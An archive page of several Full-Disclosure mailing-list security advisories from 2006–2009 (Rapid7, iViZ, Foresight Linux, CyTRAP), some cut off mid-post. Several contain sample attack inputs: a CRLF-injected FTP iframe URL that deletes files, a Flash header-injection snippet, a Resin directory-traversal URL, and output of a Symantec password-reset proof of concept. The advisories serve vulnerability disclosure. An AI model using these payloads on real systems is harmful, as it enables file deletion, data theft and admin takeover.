[Full-disclosure] [IVIZ-09-005] CA HIPS Remote Kernel Vulnerability

2009-08-19 Thread iViZ Security Advisory
---
 

[ iViZ Security Advisory 09-00519/08/2009 ]
---
 

iViZ Techno Solutions Pvt. Ltd.  
http://www.ivizsecurity.com
--
 

 
   * Title: CA HIPS kmxids.sys Remote Kernel Vulnerability
   * Software:  CA HIPS r8.1
 
--[ Synopsis:
 
   CA HIPS is a Host Based Intrusion Prevention System in which managed 
agents  
   are deployed on individual hosts to be protected by the HIPS and 
controlled  
   by the centralized console.
 
   It is possible to trigger faults in the kernel driver (kmxids.sys) 
used by
   the protection agent by sending certain malformed IP packets.
 
--[ Affected Software:
 
   * CA HIPS r8.1 (possibly older versions too)
 
 Tested on:

   * Agent Product Version: 1.5.290
   * Agent Engine  Version: 1.5.286
 
--[ Technical description:
 
   When CA HIPS agent processes certain malformed IP packets, it fails 
to handle
   certain boundary condition during parsing and pattern matching of the 
packet.
   It is possible to force the kernel driver (kmxids.sys) responsible for
   analyzing each in/out packet to reference invalid/unmapped memory.
 
   The following information is obtained during crash analysis:
 
   --
   CURRENT_IRQL:  2
 
   FAULTING_IP:
   kmxids+a2f4
   f6b8c2f4 8a26mov ah,byte ptr [esi]
 
   DEFAULT_BUCKET_ID:  DRIVER_FAULT
 
   BUGCHECK_STR:  0xD1
 
   TRAP_FRAME:  f88ca4f4 -- (.trap 0xf88ca4f4)
   ErrCode = 
   eax=f88ca754 ebx=81f7415a ecx=0003 edx=428c200c esi=6e96d603 
edi=f6b83264
   eip=f6b8c2f4 esp=f88ca568 ebp=f88ca574 iopl=0 nv up ei pl nz 
na pe nc
   cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs= 
efl=00010206
   kmxids+0xa2f4:
   f6b8c2f4 8a26mov ah,byte ptr [esi]
   ds:0023:6e96d603=??
   Resetting default scope
 
   LAST_CONTROL_TRANSFER:  from 804f7b9d to 80527bdc
 
   STACK_TEXT:
   f88ca0a8 804f7b9d 0003 f88ca404 
   nt!RtlpBreakWithStatusInstruction
   f88ca0f4 804f878a 0003 6e96d603 f6b8c2f4 
nt!KiBugCheckDebugBreak+0x19
   f88ca4d4 80540683 000a 6e96d603 0002 nt!KeBugCheck2+0x574
   f88ca4d4 f6b8c2f4 000a 6e96d603 0002 nt!KiTrap0E+0x233
   WARNING: Stack unwind information not available. Following frames may be
   wrong.
   f88ca574 f6b832e1 6e96d603 f6b83264 0003 kmxids+0xa2f4
        kmxids+0x12e1
   --
 
   The issue can be used to create a Denial of Service condition on each 
of the
   host protected by affected versions of CA HIPS agent, however due to the
   nature of the vulnerability remote code execution is unlikely.
 
--[ Impact:
 
   * Denial of Service
   * Remote Code Execution is unlikely  
 
--[ Vendor response:
 
   * Fixed in CA Host-Based Intrusion Prevention System 8.1 CF 1
 
   
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=214665
 
--[ CVE ID:
 
   CVE-2009-2740
 
--[ Credits:
 
   This vulnerability was discovered by iViZ Security Research Team
   http://www.ivizsecurity.com
 
   http://www.ivizsecurity.com/security-advisory-iviz-sr-09005.html
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Rapid7 Advisory R7-0032: Microsoft Internet Explorer FTP Command Injection Vulnerability

2008-03-11 Thread advisory
___
Rapid7 Security Advisory
Visit http://www.rapid7.com/ to download NeXpose,
SC Magazine Winner of Best Vulnerability Management product.
___

Rapid7 Advisory R7-0032
Microsoft Internet Explorer FTP Command Injection Vulnerability

   Discovered: June 16th, 2007
   Published:  March 10, 2008
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0032

1. Affected system(s):

 KNOWN VULNERABLE:
  o Internet Explorer 6 (all versions)
  o Internet Explorer 5 (all versions)

 NOT VULNERABLE:
  o Internet Explorer 7

2. Summary

   Internet Explorer 5 and 6 are vulnerable to a File Transfer Protocol 
(FTP)
   CSRF-like command injection attack, whereby an attacker could execute 
arbitrary
   commands on an unsuspecting user's authenticated or unauthenticated FTP 
session.
   An attacker could delete, rename, move, and possibly steal data and 
upload
   malicious files to an FTP server under the attacker's control, on 
behalf of the
   user.

3. Vendor status and information

   Microsoft Corporation
   http://www.microsoft.com/

   Microsoft was notified of this vulnerability on January 22, 2008.  They 

   acknowledged the vulnerability on February 7, 2008 and were given 30 
days
   to provide fix information.

4. Solution

   The vendor plans to release a patch for this issue in an upcoming 
security
   bulletin.  If possible, upgrade to Internet Explorer 7.

5. Detailed analysis

   The error occurs when a user visits a page containing a malicious FTP 
URL.
   Internet Explorer 5 and 6 decode and do not properly sanitize the 
supplied URL.
   It is possible to force Internet Explorer to chain FTP commands 
together by
   inserting URL encoded CRLF pairs after each command in the URL supplied 
by an
   HTML element.
 
 iframe src=ftp://[EMAIL PROTECTED]:port/%0D%0ADELE%20foo.txt%0D%0A/
 
   Moreover, if two forward slashes are appended to the end of the 
malicious
   URL, Internet Explorer will attempt to use an already pre-authenticated
   connection established earlier by the user in the same browser session. 
 
 
   If the user has a pre-authenticated connection to an FTP server, an
   attacker, knowing the username and endpoint of that pre-authenticated
   connection, could piggyback on the user's session to execute arbitrary
   commands.  A pre-authenticated connection is not necessary to carry out 
this
   attack, as Internet Explorer will attempt an anonymous login if no 
username is
   specified in the URL.  If only the username is specified and no 
trailing
   forward slashes are appended to the string, Internet Explorer will send 
the
   username with a blank password (which may be sufficient for more 
obscure
   anonymous user accounts).  If no username is specified, Internet 
Explorer will
   attempt to login using the 'IEUser@' user.
 
   Successful execution of some attacks may depend on the command 
tokenizing
   strategy used by the target FTP server and the security configuration 
on the
   FTP server (for instance, most FTP servers do not allow PORT requests 
for
   endpoints which do not have the same address as the requesting client).
 
   In testing, Internet Explorer 6 SP2 required the two trailing forward
   slashes for the exploit to work correctly.  Internet Explorer 6 SP1 did 
not
   have this restriction.  Internet Explorer 7 is not vulnerable to this 
issue, as
   it correctly sanitizes the URL before attempting to make the request on 
the FTP
   server.
 
   Demonstration of the exploit piggybacking on a pre-authenticated 
connection
   (malicious URL with two trailing forward slashes) with IE6 SP2:
 
   Malicious URI: ftp://[EMAIL PROTECTED]/%0D%0ADELE%20foo.txt%0D%0ACWD//
 
   -- Welcome banner
   220 debian FTP server (Version wu-2.6.2(2) Tue Mar 20 18:26:53 PST 
2007) ready.
 
   -- IE6 Requests a user
   USER admin
 
   -- FTP server requires password
   331 Password required for admin.
 
   -- IE6 supplies password.
   PASS admin
 
   -- FTP Server responds with successful login.
   230 User admin logged in.
 
   -- IE6 tests 'OPTS UTF8' option.
   opts utf8 on
 
   -- Server responds with negative permanent reply to OPTS request.
   500 'OPTS utf8 on': command not understood.
 
   -- IE6 asks for the present working directory.
   PWD
 
   -- Server sends positive completion reply for PWD.
   257 /home/admin is current directory.
 
   -- IE6 requests malicious FTP URI from an iframe in HTML doc
   CWD /home/admin/
   DELE foo.txt
   CWD/
 
   -- Server responds with positive completion for CWD
   250 CWD command successful.
 
   -- IE6 sends a 'TYPE A' request
   TYPE A
 
   -- Server responds with positive completion for DELE
   250 DELE command successful.
 
   -- IE6 sends a NOOP.
   noop
 
   -- Server sends negative permanent response for last (invalid) 
command.
   500 'CWD

[Full-disclosure] R7-0031: JFreeChart Image Map Cross-Site Scripting Vulnerabilities

2007-12-06 Thread advisory
___
Rapid7 Security Advisory
Visit http://www.rapid7.com/ to download NeXpose,
SC Magazine Winner of Best Vulnerability Management product.
___

Rapid7 Advisory R7-0031
JFreeChart Image Map Cross-Site Scripting Vulnerabilities

   Published:  Dec 06, 2007
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0031.jsp

1. Affected system(s):

   KNOWN VULNERABLE:
o JFreeChart 1.0.8

   KNOWN FIXED:
o JFreeChart 1.0.8 branch jfreechart-1.0.8-security

2. Summary

   JFreeChart is a popular Java-based chart library used to generate
   charts and graphs of data.  The library includes support for
   generating HTML image maps, which allow for enhanced interaction of
   the chart via hyperlinks bound to shapes specified by coordinates.

   Multiple cross-site scripting vulnerabilities exist within the
   image map support functionality of JFreeChart which may allow an
   attacker to inject arbitrary HTML or JavaScript into any product
   or website which uses the library.

3. Vendor status and information

   JFreeChart Project
   http://sourceforge.net/projects/jfreechart/

   The JFreeChart project was notified of this vulnerability on
   November 28th, 2007 via their online bug tracking system.  The
   vulnerability was fixed on December 6th 2007 with a commit
   to their SVN repository.

4. Solution

   Upgrade to JFreeChart SVN repository revision 682
   using branch jfreechart-1.0.8-security.
 
   See http://jfreechart.svn.sourceforge.net/viewvc/jfreechart/
   for details.

5. Detailed analysis

   JFreeChart fails to properly escape the following properties of the
   generated image map:

  o The chart name.
  o The chart tool tip text.
  o The href attribute for a chart area.
  o The shape attribute for a chart area.
  o The coords attribute for a chart area.

   It is possible to inject custom HTML code into the code generated by
   the JFreeChart library.  If a web server uses this library to generate
   charts from user-supplied data, an attacker could cause other users of
   the same website or application to execute arbitrary JavaScript code
   when viewing a page containing a chart.

6. Credit

   Discovered by Chad Loder of Rapid7.

7. Contact Information

   Rapid7, LLC
   Email: [EMAIL PROTECTED]
   Web: http://www.rapid7.com
   Phone: +1 (617) 247-1717

8. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information
   provided in our security advisories. These advisories are a service
   to the professional security community. There are NO WARRANTIES with
   regard to this information. Any application or distribution of this
   information constitutes acceptance AS IS, at the user's own risk.
   This information is subject to change without notice.

   This advisory Copyright (C) 2007 Rapid7, LLC. Permission is hereby
   granted to redistribute this advisory, providing that no changes are
   made and that the copyright notices and disclaimers remain intact.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] (no subject)

2007-06-04 Thread Foresight Linux Essential Advisory Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential 
Advisory: 2007-0024-1 Published: 2007-06-04 Rating: Moderate Updated Versions: 
libexif=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/0.6.15-0.1-1 
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3-0.1-6 References: 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2645 
https://issues.rpath.com/browse/RPL-1431 Description: Previous versions of the 
libexif package were vulnerable to an int overflow when loading EXIF data which 
could cause a crash (denial of service) or potentially allow the attacker to 
execute arbitrary code at the permission level of the user running a program 
which uses libexif. - --- Copyright 2007 Foresight Linux Project This file is 
distributed under the terms of the MIT License. A copy is available at 
http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP 
SIGNATURE- Version: GnuPG v2.0.4 (GNU/Linux) 
iQIVAwUBRmRyJdfwEn07iAtZAQKE5w//f+RbLrHDhNXq
 Ijz1LwPvNFpr3BfseRnU 
DOZ4IZgLC5Bg7tOSVZtwRZRqDtPJqizNupQH5MZGWitW2PRZTf2j6pdCaLC5uJ93 
OhALBccXxvU+TCgC19ocEDci1dCTk6oHJ0LjmSROsaWawnpTEdax0iLyYKA5NLaX 
f4eocNnsmBYJ3psCDyC14bkmE2vyose2pAA0Itd4iw7S7psZBnn4oyN3iIXTzA8M 
KQ9ZgY/YJ7qTUvakGVMbl0vninacuXGnPGSN05OTgP9X7yql5e/jaObaf1uEmgn2 
kx0WayL+9CBTU1pT3H0TbD0rXpNHNQEctcSNzOJpWBWFFuFJi4hnByTD97jy4a4P 
t0b271cjO5S+6h624od24kNxb4BggyHAn8t9U7ocGGuurD3ePUmJsTolbW4cZ/GZ 
w6VVrAsLQg3zdLu49IZJi97WwvWFdjltOGKOU4xE47Wo/MgISo5vElb8GAAOVs6t 
U0uoVoB75HNRbhrnVDNd1wM2qqCTQaWuvz3S04frz06dPGNCyEAABezrS9ij1D5m 
KB4QZoNn1gn8B1wuvmTsV+7apUeiDXUDWHWe5XdAHnNwl0xYIX00oz3iT6xbenT2 
ZK/ng88N1k639rs5iuJiYSBJL+8nD9FH6+cnUVeu63vlgvSGuuy3p+b67IhYVuf1 DCrJFbnLjVU= 
=6scq -END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CyTRAP Labs - Urs+Nahum's Security Checklist

2007-05-31 Thread CyTRAP Labs - advisory


Dear Colleague,

The latest version will always be here:

- Urs+Nahum's Security Checklist  pdf 350 KB for download 
-  http://regustand.cytrap.eu/?p=1  (PS. it is complementary and free for 
everybody, of course)

Urs+Nahum's Security Checklist was released May 30, 2007 but an UPDATED 
version was released today May 31, 2007 and is available for download at 
the above link.

Cordially

Urs E. Gattiker
   CyTRAP Labs
   Roentgenstrasse 49
   8005 Zurich
   Switzerland
   +41 (0)44 272 - 1876
   +41 (0)76 200 - 7778 (mobile)
   email: Urs+Nahum-Checklist at CyTRAP.eu

XX
At 13:00 2007-05-30, you wrote:
Message: 8
Date: Tue, 29 May 2007 14:53:17 -0700
From: blah [EMAIL PROTECTED]
Subject: Re: [Full-disclosure] CyTRAP Labs - Urs+Nahum's Security
 Checklist
To: CyTRAP Labs - advisory [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Message-ID:
 [EMAIL PROTECTED]
Content-Type: text/plain; charset=iso-8859-1

I tried the link you listed, but it didn't work (no surprise there since
it's not released), but it looks like the document's available at:
http://www.cytrap.eu/files/ReguStand/2007/pdf/Urs%2BNahumChecklist-2007-05-29.pdf

so i guess it is released.  who wants to wait til tomorrow?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CyTRAP Labs - Urs+Nahum's Security Checklist

2007-05-29 Thread CyTRAP Labs - advisory


Dear Colleagues,

I thought this might be of interestregulators have done their best to 
improve legislation to help organizations to better protect their 
information systems.

Unfortunately and as a result of this, organizations have been buried in an 
avalanche of conflicting requirements that are difficult to keep track 
off.  They are expected to demonstrate an acceptable standard of due care 
in managing their computing infrastructures and the information that 
networks and systems create, transmit, and store. Moreover, they have to 
show that all this helps reduce the risk against having their systems 
misused for criminal activities.

Hence, we thought we write Urs+Nahum's Security Checklist. It provides well 
structured information that enables high-level reporting, thus empowering 
executive and technical leaders with a greater ability to make informed 
decisions. It prioritizes numerous requirements that managers need, guiding 
them through the process that improves corporate risk management and 
information security while helping improve confidentiality of data and 
citizens' privacy.

You can get a short summary here:

- short summary about Urs+Nahum's Security Checklist  - press release -- 
http://info.cytrap.eu/?page_id=64

- an advanced copy of  Urs+Nahum's Security Checklist  pdf 350 KB for 
download -  http://regustand.cytrap.eu/?p=1  (PS. it is complementary and 
free for everybody, of course)

Urs+Nahum's Security Checklist will be released May 30, 2007.  We hope that 
it will be useful to you all in your daily work. Please let us know 
what you think about this work, if you can spare the time, of course.

Enjoy your long weekend.


Cordially

Urs E. Gattiker
   CyTRAP Labs
   Roentgenstrasse 49
   8005 Zurich
   Switzerland
   +41 (0)44 272 - 1876
   +41 (0)76 200 - 7778 (mobile)
   email: Urs+Nahum-Checklist at CyTRAP.eu 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Tele2 - Versatel and Vivendi - exploit PATCHED

2006-12-21 Thread CyTRAP Labs - advisory
This vulnerability has been patched successfully by the vendor as tests by 
various parties have demonstrated, more details here:

http://cytrap.eu/blog/?p=133

Happy Holidays
Urs E. Gattiker
CyTRAP Labs and www.CASEScontact.org


At 21:23 2006-10-04, you wrote:
--

Message: 2
Date: Wed, 04 Oct 2006 13:56:27 +0200
Subject: [Full-disclosure] Tele2 - Versatel and Vivendi - exploit
To: full-disclosure@lists.grok.org.uk
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=us-ascii; format=flowed

Tele 2 has recently announced that it is selling its Benelux assets
to Versatel and yesterday it informed the media that it intends to do
the same with its French assets, selling those to Vivendi.

The company that touts itself as providing economical broadband and
telecommunication services does, however, have a slight problem
regarding information security.

A vulenrability is being taken advantage off by various groups of
people and, in turn, this could harm home users that receive their
broadband and fixed-line services from Tele2.

In fact, several security features can be de-activated allowing a
malicious user to take control of a user's PC, his broadband
connection as well as his phone line as described here with a screen shot:

http://cytrap.eu/blog/?p=57

This is another example where user's face risks regarding their
internet connection they might not even be aware of. Another one of
those is the recent Fon example also circulated on this list.

Urs E. Gattiker
CyTRAP Labs  CASEScontact.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Rapid7 Advisory R7-0026: HTTP Header Injection Vulnerabilities in the Flash Player Plugin

2006-10-17 Thread advisory
Rapid7 Advisory R7-0026
HTTP Header Injection Vulnerabilities in the Flash Player Plugin

  Published:   Oct 17, 2006
  Revision:1.0
  http://www.rapid7.com/advisories/R7-0026.jsp

1. Affected System(s):

KNOWN VULNERABLE:
  o Flash Player plugin 9.0.16 (for Windows)
  o Flash Player plugin 7.0.63 (for Linux)

PROBABLY VULNERABLE:
  o Earlier 9.0.x and 7.0.x versions
  o 8.0.x versions

KNOWN FIXED:
  o Flash Player plugin BETA version 9.0.18d60 (for Windows)

2. Summary

Two HTTP Header Injection vulnerabilities have been discovered by Rapid7
in the Flash Player plugin. They allow attackers to perform arbitrary
HTTP requests while controlling most of the HTTP headers. This can make
it easier to perform CSRF attacks [2] in some cases. When the HTTP
server implements Keep-Alive connections and when Firefox is used, these
Flash vulnerabilities can even be used to perform totally arbitrary HTTP
requests where every part is controlled by the attacker: HTTP method,
URI, HTTP version, headers, and data. Such attacks make use of the HTTP
Request Splitting method.

3. Vendor Status and Information

Adobe Systems, Inc.
http://www.adobe.com

Sep 18, 2006
  Adobe acknowledges reception of the vulnerability details.

Sep 29, 2006
  Adobe responds with proposed dates for a fix later this year.

Oct 5, 2006
  Adobe releases a fixed BETA version of Flash 9 for Windows (version
  9.0.18d60, release files are named beta_100406).

Oct 17, 2006
  Advisory is published after expiration of the 30-day grace period
  granted to Adobe to fix and disclose the vulnerabilities.

4. Solution

Used the fixed BETA version (9.0.18d60). Only allow trusted websites to
use Flash. Disable or uninstall the Flash plugin. Use alternative Flash
plugins (GplFlash, Gnash).

5. Detailed Analysis

The vulnerabilities described hereafter have been successfully tested
with the latest versions of Flash available for various platforms as of
2006/09/06, and with multiple combinations of browser/OS:

o IE6 SP2 (aka IE6 SV1) for Windows, with Flash plugin 9.0.16
o Firefox 1.5.0.6 for Windows, with Flash plugin 9.0.16
o Firefox 1.5.0.6 for Linux, with Flash plugin 7.0.63

5.1. XML.addRequestHeader() Vulnerability

Flash features a scripting language called ActionScript. ActionScript
comes with a certain number of standard classes available to Flash
developers. In particular, the send() method of the XML object can be
used to send XML document trees to arbitrary URLs using, by default, a
POST request. This, in itself, is not a vulnerability; the XML.send()
method definitely complies with the Flash security model [4].

However another method defined in the XML class, addRequestHeader(), can
be used to add arbitrary HTTP headers to the request performed by Flash.
Its intended usage is:

  var req:XML=new XML('test');
  req.addRequestHeader(X-My-Header, 42);
  req.send(http://host/path;);

When calling req.send(http://host/path;), such a POST request would be
submitted to 'host' (common HTTP headers that do not matter to us in
this example have been removed for brevity):

  POST /path HTTP/1.1
  Host: host
  Referer: (referer)
  Content-type: application/x-www-form-urlencoded
  X-My-Header: 42
  Content-Length: 4

  test

For security reasons, Flash 9 does not let developers use
addRequestHeader() to set headers such as Host, Referer, or
Content-Length.

But there is a way to get around this security restriction: the
addRequestHeader() method does not sufficiently sanity check its two
arguments. This makes it possible to inject arbitrary headers:

  req.addRequestHeader(Referer:http://anywhere\r\nX-foo;, bar);

With IE, a request containing only the fake Referer is sent:

  POST /path HTTP/1.1
  Host: host
  Referer: http://anywhere
  Content-Type: application/x-www-form-urlencoded
  X-foo: bar
  Content-Length: 4

  test

With Firefox, a request containing both the real Referer and the fake
one is sent:

  POST /path HTTP/1.1
  Host: host
  Referer: (real referer)
  Content-type: application/x-www-form-urlencoded
  Referer:http://anywhere
  X-foo: bar
  Content-Length: 4

  test

For this attack to work, the first argument of addRequestHeader() must
not contain any space (ASCII 0x20) else the Flash plugin appears to
ignore the addRequestHeader() call. This is absolutely not a problem in
real-world attack scenarios, because the space character usually present
before the Referer value is optional (see RFC 2616 [5], section 4.2
Message Headers).

It is interesting to note that IE seems to post-process the headers
generated by Flash before sending them to the HTTP server. Indeed, IE
diligently removes the real Referer to use the Flash-generated one, and
it even automatically adds the optional space character before the fake
Referer value.

Of course any cookie that would be associated with 'host' would be
automatically sent along with the request, which is another good thing
for attackers.

For total control of the generated request, when the server supports

[Full-disclosure] Rapid7 Advisory R7-0025: Buffer Overflow in NVIDIA Binary Graphics Driver For Linux

2006-10-16 Thread advisory
___
 Rapid7, LLC Security Advisory
Visit http://www.rapid7.com/ to download NeXpose,
SC Magazine Winner of Best Vulnerability Management product.
___


Rapid7 Advisory R7-0025
Buffer Overflow in NVIDIA Binary Graphics Driver For Linux

   Published:  Oct 16, 2006
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0025.jsp

1. Affected system(s):

   KNOWN VULNERABLE:
o NVIDIA Driver For Linux v8774
o NVIDIA Driver For Linux v8762

   PROBABLY VULNERABLE:
o NVIDIA Driver for FreeBSD
o NVIDIA Driver for Solaris
o Earlier versions

   KNOWN FIXED:
o None

2. Summary

   The NVIDIA Binary Graphics Driver for Linux is vulnerable to a
   buffer overflow that allows an attacker to run arbitrary code as
   root. This bug can be exploited both locally or remotely (via
   a remote X client or an X client which visits a malicious web page).
   A working proof-of-concept root exploit is included with this
   advisory.

   The NVIDIA drivers for Solaris and FreeBSD are also likely to be
   vulnerable.

3. Vendor status and information

   NVIDIA Corporation
   http://www.nvidia.com

   There have been multiple public reports of this NVIDIA bug on the
   NVNews forum [1,2] and elsewhere, dating back to 2004 [3]. NVIDIA's
   first public acknowledgement of this bug was on July 7th, 2006. In a
   public posting [1] on the NVNews forum, an NVIDIA employee reported
   having reproduced the problem, assigned it bug ID 239065, and promised
   a fix would be forthcoming.

   As of the publication date, the latest NVIDIA binary driver is still
   vulnerable. Furthermore, it is our opinion that NVIDIA's binary driver
   remains an unacceptable security risk based on the large numbers of
   reproducible, unfixed crashes that have been reported in public forums
   and bug databases. This number does not include bugs reported directly
   to NVIDIA.

   1. http://www.nvnews.net/vbulletin/showthread.php?p=931048   (Jul 2006)
   2. http://www.nvnews.net/vbulletin/showthread.php?t=76493(Sep 2006)
   3. https://bugs.freedesktop.org/show_bug.cgi?id=2129 (Dec 2004)
   4. http://lists.freedesktop.org/archives/xorg/2005-January/005642.html
   5. http://forums.gentoo.org/viewtopic.php?t=282107   (Jan 2005)
   6. https://bugs.eclipse.org/bugs/show_bug.cgi?id=87299   (Mar 2005)
   7. http://www.nvnews.net/vbulletin/showthread.php?t=76206(Sep 2006)

4. Solution

   Disable the binary blob driver and use the open-source nv driver
   that is included by default with X.

5. Detailed analysis

   There are two NVIDIA graphics drivers for Linux: a closed-source
   binary blob driver provided by NVIDIA (which provides acceleration)
   and an open-source driver (which lacks acceleration). NVIDIA's
   binary blob driver contains an error in its accelerated rendering
   of glyphs (text character data) that can be exploited to write
   arbitrary data to anywhere in memory. The open-source driver is
   not vulnerable.

   The XRender extension provides a client function named
   XRenderCompositeString8 which tells the X server to render glyphs
   onto the screen. This request is processed by the server's
   ProcRenderCompositeGlpyhs function. This function pulls the glyphs
   out of the render request, constructs a glyph list, and then calls
   into the graphics driver via a registered callback function.

   The NVIDIA binary blob driver registers a function named _nv000373X.
   This function calculates a bounding BoxRec of the total area occupied
   by the glyph data. It then uses Xalloc to allocate a buffer large
   enough to hold the data by multiplying width * height. This buffer
   is then passed to another internal function called _nv53X.

   The _nv53X function iterates over the glyph list and copies
   glyph data into the buffer using each glyph's accumulated width,
   xOff, height, and yOff values to calculate the destination position
   in the buffer. The NVIDIA binary blob driver does not check this
   calculation against the size of the allocated buffer. As a result,
   a short sequence of user-supplied glyphs can be used to trick the
   function into writing to an arbitrary location in memory.

   It is important to note that glyph data is supplied to the X server
   by the X client. Any remote X client can gain root privileges on
   the X server using the proof of concept program attached.

   It is also trivial to exploit this vulnerability as a DoS by causing
   an existing X client program (such as Firefox) to render a long text
   string. It may be possible to use Flash movies, Java applets, or
   embedded web fonts to supply the custom glyph data necessary for
   reliable remote code execution.

   A simple HTML page containing an INPUT field with a long value is
   sufficient to demonstrate

[Full-disclosure] Caucho Resin Windows Directory Traversal Vulnerability

2006-05-16 Thread advisory
___
Rapid7 Security Advisory
Visit http://www.rapid7.com/ to download NeXpose,
SC Magazine Winner of Best Vulnerability Management product.
___

Rapid7 Advisory R7-0024
Caucho Resin Windows Directory Traversal Vulnerability

   Published:  May 16, 2006
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0024.html

   CVE:CVE-2006-1953

1. Affected system(s):

   KNOWN VULNERABLE:
o Caucho Resin v3.0.18 for Windows
o Caucho Resin v3.0.17 for Windows

   NOT VULNERABLE:
o Caucho Resin v3.0.19
o Caucho Resin v3.0.16 and earlier

2. Summary

   The Caucho Resin web application server for Windows contains a
   directory traversal vulnerability that allows remote
   unauthenticated users to download any file from the system. It is
   possible to download files from any drive on the system.

   Rapid7 have updated NeXpose to check for this vulnerability. Licensed
   customers will receive the new vulnerability checks automatically.
   Visit http://www.rapid7.com to register for a free demo of NeXpose.

3. Vendor status and information

   Caucho Technology, Inc.
   http://www.caucho.com/

   Caucho was notified of this vulnerability on April 20th, 2006.
   They fixed this vulnerability in the latest unofficial snapshot
   of Resin 3.0.19, available from Caucho's website.

4. Solution

   Upgrade to the latest snapshot version of Resin, version 3.0.19.

5. Detailed analysis

   Caucho Resin is a servlet and JSP server. Resin ships with its own
   standalone web server which runs by default on port 8080. Any remote
   user can request URLs of the form:

  http://victim:8080/C:%5C/

   to access the root of the C: drive (and any files below it). Any
   drive letter can be specified.  Only Resin on Windows is vulnerable.

   This vulnerability appears to have been introduced in Resin
   version 3.0.17, although this has not been confirmed by the vendor.

6. Contact Information

   Rapid7 Security Advisories
   Email:  [EMAIL PROTECTED]
   Web:http://www.rapid7.com/
   Phone:  +1 (617) 603-0700

7. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information
   provided in our security advisories.  These advisories are a service
   to the professional security community.  There are NO WARRANTIES
   with regard to this information.  Any application or distribution of
   this information constitutes acceptance AS IS, at the user's own
   risk.  This information is subject to change without notice.

   This advisory Copyright (C) 2006 Rapid7, LLC.  Permission is
   hereby granted to redistribute this advisory, providing that no
   changes are made and that the copyright notices and disclaimers
   remain intact.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Rapid7 Advisory R7-0021: Symantec Scan Engine Authentication Fundamental Design Error

2006-04-24 Thread advisory
___
 Rapid7, LLC Security Advisory
___

Rapid7 Advisory R7-0021
Symantec Scan Engine Authentication Fundamental Design Error

   Published:  April 21, 2006
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0021.html

   CVE: CVE-2006-0230

1. Affected system(s):

   KNOWN VULNERABLE:
o Symantec Scan Engine v5.0.0.24

   KNOWN FIXED:
o Symantec Scan Engine v5.1.0.7

   UNKNOWN (PROBABLY VULNERABLE):
o All v5.0.x.x
o Earlier versions

2. Summary

   Symantec Scan Engine provides a web-based administrative interface
   that is used for managing scanning options and antivirus
   definitions. To access the interface, an administrator must browse
   to it, load a Java applet, and log in with a password.

   However, the authentication mechanism used by Symantec Scan Engine
   contains a fundamental design flaw that allows any remote user to
   gain full administrative access to the server. The server does not
   verify the password entered by the user. The password is only
   verified by the client-side Java applet. Anyone with knowledge of
   the underlying communication mechanism can exercise full control of
   the Scan Engine server simply by posting XML requests to the server
   using its proprietary protocol.

   NeXpose, Rapid7's award-winning vulnerability assessment platform,
   checks for this vulnerability and other vulnerabilities we have
   discovered in Symantec Scan Engine. Visit http://www.rapid7.com
   to register for a free demo of NeXpose.

3. Vendor status and information

   Symantec Corporation
   http://www.symantec.com

   Symantec was notified of this vulnerability on January 17, 2006.
   They acknowledged the vulnerability, then provided us with a
   fixed version. Rapid7's advisory was publicly released on April 21,
   2006.

4. Solution

   Upgrade to Symantec Scan Engine v5.1.0.7 or later.

5. Detailed analysis

   The administrative web interface, which is typically accessible on
   default TCP port 8004, is implemented as a Java applet. Also, an
   additional SSL connection to TCP port 8005 is used by the applet to
   exchange configuration information with the server using a proprietary
   protocol based on XML exchanges. The authentication model used by the
   administrative interface is utterly flawed, because the server trusts
   the client applet to correctly authenticate users. The protocols
   themselves (HTTP on port 8004 and proprietary protocol on port 8005)
   do NOT require client authentication.

   For example, when an administrator user changes his password via the
   administrative interface, the Java applet simply connects to port
   8005 and sends a request to change the administrator password hash.
   No authentication is required. The direct consequence of this is
   that any remote attacker can change the administrator password to a
   password of his choice.

   We have included with this advisory a proof-of-concept Perl script
   which demonstrates this vulnerability
   (see change_scan_engine_pw.pl).

   Here is an example scenario:

   $ ./change_scan_engine_pw.pl --pwd foobar 10.68.4.4
   Old hash: 
E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF
   New hash: 
656268BDDE60892B3B5D92781E79C05031E2B48F3D222EB8A71D507FAB2E9EB0
   Password successfully set to: 'foobar'
   $ ./change_scan_engine_pw.pl \
   --hash E97B788686921D991B3179F1E8CCA6491D3714F2F3EC2ADE399CB71A828090AF 
\
   10.68.4.4
   Old hash: 
656268BDDE60892B3B5D92781E79C05031E2B48F3D222EB8A71D507FAB2E9EB0
   New hash: 
